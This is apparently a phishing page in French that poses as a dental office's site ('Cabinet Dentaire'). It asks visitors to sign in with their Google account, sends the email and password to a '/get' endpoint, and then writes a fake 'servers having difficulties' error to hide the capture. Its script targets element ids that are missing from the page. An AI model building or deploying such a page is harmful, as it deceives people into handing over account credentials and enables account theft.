<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!-- Generator: Adobe Illustrator 15.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->

<svg
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:cc="http://creativecommons.org/ns#"
   xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
   xmlns:svg="http://www.w3.org/2000/svg"
   xmlns="http://www.w3.org/2000/svg"
   xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd"
   xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape"
   version="1.1"
   id="Mode_Isolation"
   x="0px"
   y="0px"
   width="1050"
   height="1050"
   viewBox="0 0 1050 1050"
   enable-background="new 0 0 122 125"
   xml:space="preserve"
   inkscape:version="0.92.4 (5da689c313, 2019-01-14)"
   sodipodi:docname="icon-implant-grey0.svg"><metadata
     id="metadata63"><rdf:RDF><cc:Work
         rdf:about=""><dc:format>image/svg+xml</dc:format><dc:type
           rdf:resource="http://purl.org/dc/dcmitype/StillImage" /><dc:title></dc:title></cc:Work></rdf:RDF></metadata><defs
     id="defs61" /><sodipodi:namedview
     pagecolor="#ffffff"
     bordercolor="#666666"
     borderopacity="1"
     objecttolerance="10"
     gridtolerance="10"
     guidetolerance="10"
     inkscape:pageopacity="0"
     inkscape:pageshadow="2"
     inkscape:window-width="1920"
     inkscape:window-height="1016"
     id="namedview59"
     showgrid="false"
     inkscape:zoom="0.5807326"
     inkscape:cx="455.3621"
     inkscape:cy="-378.87639"
     inkscape:window-x="0"
     inkscape:window-y="27"
     inkscape:window-maximized="1"
     inkscape:current-layer="Mode_Isolation" /><path
     style="fill:#2b9ebd;fill-opacity:1"
     d="M 496.62226,1026.0171 C 272.06196,1014.8352 79.623803,847.52445 35.942163,625.48971 6.5751926,476.21677 45.709113,324.16851 143.52415,207.49806 227.23046,107.656 349.02626,43.953235 479.47386,31.786445 713.54876,9.9544095 933.49786,157.88477 1002.2757,383.40532 c 24.3561,79.86307 27.6468,177.22023 8.6895,257.08922 -40.74674,171.67058 -164.75164,307.2214 -331.06964,361.89516 -59.1498,19.4443 -117.1411,26.9205 -183.2733,23.6274 z m -19.1819,-204.80908 c 3.188,-3.18793 3.403,-6.13382 1.7608,-24.1149 -3.3868,-37.08182 -1.8716,-86.82643 3.2355,-106.22523 5.5659,-21.14163 18.9413,-48.76318 28.804,-59.48343 14.5654,-15.83185 27.3172,-7.88808 44.6603,27.82136 16.2468,33.45238 21.2506,79.46838 14.6515,134.73847 -2.1311,17.84886 -2.0064,21.10558 0.9836,25.66889 9.2062,14.05033 35.9837,-0.78891 56.3258,-31.2139 15.9614,-23.87301 30.7333,-61.4888 35.9943,-91.65766 4.0732,-23.35765 4.0625,-62.54266 -0.025,-89.65883 -7.4341,-49.3226 -2.575,-83.78685 18.3605,-130.22574 33.8518,-75.08974 40.045,-95.9012 37.677,-126.60875 -3.1948,-41.43037 -24.2679,-78.56923 -56.1554,-98.96742 -30.3269,-19.39987 -67.8056,-23.56135 -114.5744,-12.72187 l -24.6508,5.71323 -24.4053,-5.7588 c -56.9412,-13.43619 -100.2261,-4.0298 -133.2026,28.9467 -24.3557,24.35562 -36.3831,54.92839 -36.3831,92.48275 0,27.11842 5.1773,44.74595 28.5715,97.27839 21.1475,47.48751 26.3669,63.29724 29.7564,90.13334 2.189,17.33141 1.8992,24.29224 -2.4591,59.07261 -5.3289,42.52504 -5.0482,67.78631 1.0768,96.90331 7.5938,36.09981 25.2004,74.6777 45.0836,98.78309 16.2464,19.69619 35.9397,28.0685 44.9138,19.09439 l 0,0 z"
     id="path2991"
     inkscape:connector-curvature="0" /></svg>
    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Bienvenue sur le site Cabinet Dentaire.</h1>
            <h2 class='containersubtitle'> Connectez vous avec votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Mot de Passe" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
